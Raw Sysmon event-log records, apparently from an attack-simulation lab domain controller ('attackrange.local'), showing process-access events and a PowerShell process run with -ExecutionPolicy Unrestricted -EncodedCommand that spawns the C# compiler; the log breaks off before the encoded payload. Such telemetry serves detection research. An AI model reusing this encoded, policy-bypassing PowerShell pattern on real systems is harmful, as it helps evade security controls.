DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8E1C-6005-C002-00000000A201}51083688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.462{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES69A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC79A909A5B61A491480FF1A7C5965B9C4.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4lax1uev.cmdline" 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8E1A-6005-BE02-00000000A201}22644088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402CB68F) 154100x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.297{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4lax1uev.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 